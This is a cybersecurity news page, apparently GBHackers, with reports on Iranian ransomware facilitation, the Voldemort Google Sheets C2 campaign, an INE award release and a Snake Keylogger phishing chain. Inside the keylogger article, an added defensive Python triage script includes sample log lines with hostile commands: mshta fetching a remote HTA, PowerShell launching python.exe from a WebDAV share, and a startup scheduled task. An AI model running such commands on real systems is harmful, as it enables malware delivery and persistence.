CYBERSECURITY / DEFENSE / INTELLIGENCE

  • Security elites gathering in Prague say it’s time for Europe to step up military support for Ukraine…and Europe.


  • Cybersecurity researchers have uncovered a novel malware campaign that leverages Google Sheets as a command-and-control (C2) mechanism. The activity, detected by Proofpoint starting August 5, 2024, impersonates tax authorities from governments in Europe, Asia, and the U.S., with the goal of targeting over 70 organizations worldwide by means of a bespoke tool called Voldemort that’s equipped to


  • Iranian cyber actors have been identified as the perpetrators behind ransomware attacks targeting U.S. organizations across multiple sectors.

    This revelation comes from a joint Cybersecurity Advisory issued by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Defense Cyber Crime Center (DC3).

    Background of the Threat Group

    The Iranian threat group, known by various names such as Pioneer Kitten, Fox Kitten, and more recently “xplfinder,” has been active since 2017.

    These cyber actors have a history of conducting computer network intrusions aimed at U.S. organizations, including schools, municipal governments, financial institutions, and healthcare facilities.

    The FBI’s analysis suggests that the group’s activities are consistent with state-sponsored cyber operations, with a significant portion of their efforts focused on enabling ransomware attacks.

    The Iranian cyber actors have exploited vulnerabilities in public-facing applications and networking devices to gain initial access to victim networks.

    They have been observed using advanced techniques such as deploying webshells, capturing login credentials, and creating backdoors to maintain persistent access.

    Once inside, these actors collaborate with ransomware affiliates, including groups like NoEscape, Ransomhouse, and ALPHV (BlackCat), to execute ransomware operations.


    The collaboration involves providing ransomware affiliates access to compromised networks, assisting in locking victim networks, and strategizing on extortion tactics.

    In return, the Iranian actors receive a share of the ransom payments. This partnership highlights a sophisticated and coordinated approach to cybercrime, leveraging technical expertise and strategic alliances.

    Impact on U.S. Organizations

    These ransomware attacks have been significant, affecting various sectors, including education, finance, healthcare, and local government entities.

    The advisory warns that the group’s activities are not limited to the U.S., as they have also targeted organizations in countries like Israel, Azerbaijan, and the United Arab Emirates.

    Victims of these attacks often face severe operational disruptions, financial losses, and potential exposure of sensitive data.

    The advisory emphasizes the importance of immediate reporting and collaboration with authorities to mitigate the impact of these attacks and prevent further exploitation.

    Mitigation Strategies and Recommendations

    In response to this threat, the FBI and CISA have recommended that organizations bolster their cybersecurity defenses.

    Key measures include:

    • Patch Management: Organizations are urged to apply patches and mitigations for known vulnerabilities, such as CVE-2024-3400 and CVE-2022-1388, which Iranian actors have exploited.
    • Network Monitoring: Regularly review network logs for indicators of compromise, such as unusual traffic patterns or unauthorized access attempts.
    • Credential Security: Strengthen authentication mechanisms, including multi-factor authentication, to protect against credential theft and misuse.
    • Incident Reporting: Promptly report any suspicious or malicious activity to the FBI or CISA to facilitate a coordinated response and investigation.

    The advisory underscores the critical need for organizations to remain vigilant and proactive in their cybersecurity efforts.

    By implementing these recommended practices, organizations can better defend against the evolving tactics of state-sponsored cyber actors.

    In conclusion, the ongoing threat posed by Iranian cyber actors highlights the importance of robust cybersecurity measures and international cooperation in combating cybercrime.

    Organizations must remain agile and prepared to respond to emerging threats as these actors continue to adapt and evolve their tactics.


    The post Iranian Threat Group Attack US Organization via Ransomware appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.


  • Researchers from Proofpoint have uncovered a sophisticated cyberattack campaign leveraging Google Sheets as a command and control (C2) platform.

    Dubbed “Voldemort” by the researchers, this campaign targets Windows users globally, employing a novel attack chain that combines both common and rare techniques to deliver custom malware.

    This article delves into the intricacies of the campaign, its implications, and the broader cybersecurity challenges it presents.

    Unveiling the Voldemort Campaign

    Proofpoint researchers identified an attack campaign that stands out due to its unique use of Google Sheets for C2 operations.

    The malware, internally named “Voldemort,” is a custom backdoor written in C, capable of gathering information and deploying additional payloads.

    The attack chain involves a series of sophisticated techniques, including the abuse of Google Sheets, which is relatively uncommon in the threat landscape.


    The campaign began on August 5, 2024, and involved over 20,000 malicious messages targeting more than 70 organizations worldwide.

    The threat actors impersonated tax authorities from various countries, including the U.S., UK, France, Germany, Italy, India, and Japan.

    These emails, written in the language of the impersonated authority, were sent from compromised domains, adding a layer of authenticity to the phishing attempts.

    Emails impersonating HMRC and DGFIP

    Attack Chain Mechanics

    The emails contained links that redirected victims to a landing page hosted on InfinityFree. Upon clicking a “View Document” button, the page checked the user’s browser for a Windows environment.

    If detected, the victim was redirected to a TryCloudflare-tunneled URI, prompting the opening of Windows Explorer.

    This stealthy redirection technique allowed the malware to masquerade as a local PDF file, increasing the likelihood of user interaction.

    InfinityFree-hosted landing page

    Technical Analysis of the Malware

    The Voldemort campaign exploits the Windows search protocol (search-ms) to display remote files as if they were local.

    This technique, used to deploy remote access trojans (RATs), is becoming increasingly popular among cybercriminals. The campaign also utilizes saved search file formats (.search-ms) to further obscure the malicious activity.

    HTML redirect logic embedded on a landing page

    Execution and Payload Delivery

    If the victim executes the malicious LNK file, it triggers a PowerShell command to run Python.exe from a WebDAV share, executing a Python script without downloading files to the host.

    This script collects system information and sends it to the threat actor’s infrastructure. The malware then downloads a decoy PDF and a password-protected ZIP file, extracting and executing a legitimate executable vulnerable to DLL hijacking.

    Shortcut masquerading as a PDF

    The Role of Google Sheets in C2 Operations

    Leveraging Google Infrastructure

    Rather than using dedicated or compromised infrastructure, the Voldemort malware utilizes Google Sheets for C2, data exfiltration, and command execution.

    By authenticating with Google Sheets using a client token, the malware can read and write data, effectively using the platform as a communication channel with the threat actors.

    The malware supports a range of commands, including file operations and system commands, all executed via Google Sheets.

    The actors can issue commands to the bot, which reports back with status messages, including the malware’s name, “Voldemort.”

    Decrypted status messages

    Implications and Challenges

    APT Activity with Cybercrime Characteristics

    Proofpoint assesses with moderate confidence that the Voldemort campaign is likely orchestrated by an advanced persistent threat (APT) actor focused on intelligence gathering.

    Despite its espionage-like capabilities, the campaign’s volume and targeting align more closely with cybercriminal activities, presenting a unique blend of threats.

    PCAP of pingb.in traffic

    The abuse of cloud services like Google Sheets for malicious purposes highlights a growing trend in the cyber threat landscape.

    Such tactics allow threat actors to leverage legitimate infrastructure, making detection and mitigation more challenging for cybersecurity professionals.

    Manual browsing of WebDAV share

    The Voldemort campaign represents a significant evolution in cyberattack strategies, combining sophisticated techniques with innovative cloud-based services for malicious purposes.

    As threat actors continue to adapt and exploit new technologies, cybersecurity professionals must remain vigilant and proactive in developing defenses against such complex threats.

    Using Google Sheets as a C2 platform underscores the need for enhanced security measures and awareness of the potential misuse of legitimate cloud services.


    The post Voldemort Threat Actors Abusing Google Sheets to Attack Windows Users appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.


  • Cybersecurity researchers have unearthed new network infrastructure set up by Iranian threat actors to support activities linked to the recent targeting of U.S. political campaigns. Recorded Future’s Insikt Group has linked the infrastructure to a threat it tracks as GreenCharlie, an Iran-nexus cyber threat group that overlaps with APT42, Charming Kitten, Damselfly, Mint Sandstorm (formerly


  • Cary, North Carolina, August 30th, 2024, CyberNewsWire: INE Security is pleased to announce that it has been recognized as a 2024 SC Award finalist in the Excellence Award category for Best IT Security-Related Training Program.

    Marking its 27th year, the SC Awards recognize the solutions, organizations, and individuals that have demonstrated exceptional achievement in advancing information security.

    This year, the SC Awards received a remarkable number of entries across 34 specialty categories, with many notable companies earning nominations for their leadership and commitment to cybersecurity education.

    “We are honored to be recognized as a finalist in the SC Awards for our commitment to excellence in IT security training,” said Dara Warn, CEO of INE Security.

    “This nomination reflects our dedication to empowering professionals with the knowledge and skills they need to tackle today’s sophisticated cybersecurity challenges. At INE Security, we remain committed to advancing the industry through the best cybersecurity training and certification platform, and innovative, high-quality training solutions that meet the evolving needs of the cybersecurity community.”

    “The finalists for the 2024 SC Awards truly represent the forefront of cybersecurity innovation and leadership,” said Tom Spring, Editorial Director at SC Media.

    “These solutions, organizations, and professionals have demonstrated outstanding capabilities in addressing today’s complex and ever-changing threat landscape. We are proud to recognize their contributions to the cybersecurity community.”

    INE Security has been recognized among the best cybersecurity training platforms in 2024 by numerous organizations including:

    The SC Awards were evaluated by a distinguished panel of judges, including cybersecurity professionals, industry leaders, and members of the CyberRisk Alliance community from sectors such as healthcare, financial services, education, and technology.

    Winners of the 2024 SC Awards will be announced on September 17, 2024.

    About INE Security:

    INE Security is the premier provider of online networking and cybersecurity training and certification. Harnessing a powerful hands-on lab platform, cutting-edge technology, a global video distribution network, and world-class instructors, INE Security is the top training choice for Fortune 500 companies worldwide for cybersecurity training in business and for IT professionals looking to advance their careers.

    INE Security’s suite of learning paths offers an incomparable depth of expertise across cybersecurity and is committed to delivering advanced technical training while also lowering the barriers worldwide for those looking to enter and excel in an IT career.

    About CyberRisk Alliance

    CyberRisk Alliance provides business intelligence that helps the cybersecurity ecosystem connect, share knowledge, accelerate careers, and make smarter and faster decisions.

    Through our trusted information brands, network of experts, and more than 250 innovative annual events we provide cybersecurity professionals with actionable insights and act as a powerful extension of cybersecurity marketing teams.

    Our brands include SC Media, the Official Cybersecurity Summits, Security Weekly, InfoSec World, Identiverse, CyberRisk Collaborative, ChannelE2E, MSSP Alert, LaunchTech Communications and TECHEXPO Top Secret.

    Users can learn more at www.cyberriskalliance.com.

    Contact

    • Director of Global Strategic Communications and Events
    • Kathryn Brown
    • INE Security
    • kbrown@ine.com

    The post INE Security Named 2024 SC Awards Finalist appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.


  • Cybersecurity researchers have disclosed a new campaign that potentially targets users in the Middle East through malware that disguises itself as Palo Alto Networks GlobalProtect virtual private network (VPN) tool. “The malware can execute remote PowerShell commands, download and exfiltrate files, encrypt communications, and bypass sandbox solutions, representing a significant threat to


  • The most dangerous vulnerability you’ve never heard of. In the world of cybersecurity, vulnerabilities are discovered so often, and at such a high rate, that it can be very difficult to keep up with. Some vulnerabilities will start ringing alarm bells within your security tooling, while others are far more nuanced, but still pose an equally dangerous threat. Today, we want to discuss one of


  • Researchers uncovered a sophisticated phishing campaign that exploits a .NET-based Snake Keylogger variant.

    This attack leverages weaponized Excel documents to infiltrate Windows systems, posing significant threats to user data security.

    This article delves into the mechanics of the attack, the techniques employed by the malware, and the implications for users and organizations.

    Understanding Snake Keylogger

    Snake Keylogger, also known as “404 Keylogger” or “KrakenKeylogger,” is notorious malware that was initially distributed on hacker forums as a subscription-based service.

    This .NET-based software is designed to steal sensitive data, including saved credentials from web browsers, clipboard content, and basic device information.

    It can also log keystrokes and capture screenshots, making it a potent tool for cybercriminals.


    The Phishing Email

    Fortinet’s FortiGuard Labs reported that the attack begins with a phishing email that attempts to deceive recipients into opening an attached Excel file named “swift copy.xls.”

    The email claims that funds have been transferred into the recipient’s account, a common tactic to lure victims into action.

    FortiGuard services mark these emails with a “[virus detected]” warning in the subject line, but unsuspecting users may still fall for the trap.

    The phishing email attempts to deceive the recipient into opening the attached Excel file

    The Malicious Excel Document

    Upon opening the Excel file, malicious code is executed in the background. The document contains a specially crafted embedded link object that exploits the CVE-2017-0199 vulnerability to download additional malicious files.

    This process is covert, with the Excel program secretly requesting a URL that leads to further malware downloads.

    Malicious Excel document

    The attack chain continues by downloading an HTML Application (HTA) file, executed by the Windows application host (mshta.exe).

    This file contains obfuscated JavaScript code that, once decoded, reveals VBScript and PowerShell scripts.

    These scripts are responsible for downloading and executing the Snake Keylogger’s loader module, a critical attack component.

    The Loader Module

    The downloaded executable file, the Loader module, is developed using the Microsoft .NET Framework.

    It employs multiple-layer protection techniques, including transformation and encryption, to evade detection by cybersecurity products.

    The Loader module extracts and decrypts several components from its resource section, essential for deploying the core Snake Keylogger module.

    Loader module analysis

    Deploy Module and Persistence

    The Deploy module, extracted from the Loader, ensures Snake Keylogger’s persistence on the victim’s system.

    It renames the Loader module file, sets it as hidden and read-only, and creates a scheduled task in the system Task Scheduler to launch at startup.

    This module also performs process hollowing, a technique that allows the malware to hide its operations by injecting malicious code into a new process.

    Scheduled task for Snake Keylogger
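    Covering both the Voldemort execution chain described earlier on this page (PowerShell running python.exe straight from a WebDAV share) and the Snake Keylogger chain here (Excel spawning mshta.exe for the HTA stage, then a startup scheduled task), the script below is an added triage example, not code from either report: it runs three process-creation rules over constructed Sysmon-style log lines. The field names, hostnames, file paths and the 192.0.2.10 address are assumptions, not indicators from the articles.

```python
"""Triage constructed process-creation events for the execution chains this
page describes: python.exe launched off a WebDAV share, an Office process
spawning a script host, and a logon task pointing into a user profile.
Added example; field layout, hosts and paths are assumptions."""
import re

# Constructed sample lines in a Sysmon-like key="value" layout (not real telemetry).
SAMPLE_LOG = r'''
ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell.exe -w hidden \\tunnel.example.invalid@SSL\DavWWWRoot\python.exe stage.py"
ParentImage="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" Image="C:\Windows\System32\mshta.exe" CommandLine="mshta.exe http://192.0.2.10/xampp/zoom/stage.hta"
ParentImage="C:\Windows\System32\cmd.exe" Image="C:\Windows\System32\schtasks.exe" CommandLine="schtasks.exe /create /sc onlogon /tn Updater /tr C:\Users\alice\AppData\Roaming\svc\host.exe"
ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell.exe -File C:\Scripts\backup.ps1"
ParentImage="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" Image="C:\Windows\splwow64.exe" CommandLine="splwow64.exe 12288"
'''

FIELD = re.compile(r'(\w+)="([^"]*)"')
OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
# UNC prefix Windows uses for a WebDAV mount, e.g. \\host@SSL\DavWWWRoot\ or \\host@443\
WEBDAV_UNC = re.compile(r'\\\\[\w.-]+(@ssl)?(@\d+)?\\(davwwwroot\\)?', re.I)


def parse_event(line):
    """Reduce one log line to lower-cased image basenames plus the raw command line."""
    fields = dict(FIELD.findall(line))
    return {
        "parent": fields.get("ParentImage", "").rsplit("\\", 1)[-1].lower(),
        "image": fields.get("Image", "").rsplit("\\", 1)[-1].lower(),
        "cmdline": fields.get("CommandLine", ""),
    }


def classify(ev):
    """Return the rule names an event matches; an empty list means nothing fired."""
    hits = []
    cl = ev["cmdline"].lower()
    # Voldemort-style: PowerShell invoking python.exe from a WebDAV (UNC) share
    if ev["image"] == "powershell.exe" and "python" in cl and WEBDAV_UNC.search(cl):
        hits.append("webdav-python-launch")
    # Snake Keylogger-style: Office document spawning a script host such as mshta.exe
    if ev["parent"] in OFFICE and ev["image"] in SCRIPT_HOSTS:
        hits.append("office-spawns-script-host")
    # Deploy-module style persistence: logon/startup task whose action lives under AppData
    if (ev["image"] == "schtasks.exe" and "/create" in cl
            and re.search(r"/sc\s+(onlogon|onstart)", cl) and "\\appdata\\" in cl):
        hits.append("startup-task-from-user-profile")
    return hits


def triage(log_text):
    """Map the 1-based index of each suspicious line to the rules it matched."""
    findings = {}
    for n, line in enumerate(filter(None, log_text.strip().splitlines()), 1):
        hits = classify(parse_event(line))
        if hits:
            findings[n] = hits
    return findings


if __name__ == "__main__":
    for n, hits in triage(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(hits)}")
```

    The two benign lines (a local PowerShell script and Excel's print helper) produce no finding, so the rules key on the chain's shape rather than on the tools themselves.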

    The Snake Keylogger attack highlights the evolving tactics of cybercriminals and the importance of robust cybersecurity measures.

    Users and organizations must remain vigilant, employing updated antivirus software and exercising caution with email attachments.

    Awareness and education are crucial in preventing sophisticated attacks from compromising sensitive data.

    Snake Keylogger summary

    The .NET-based Snake Keylogger attack via weaponized Excel documents represents a significant threat to Windows users.

    By understanding the attack’s mechanics and employing proactive security measures, individuals and organizations can better protect themselves against this and similar cyber threats.

    IOCs



    The post .NET-based Snake Keylogger Attack Windows Using Weaponized Excel Documents appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
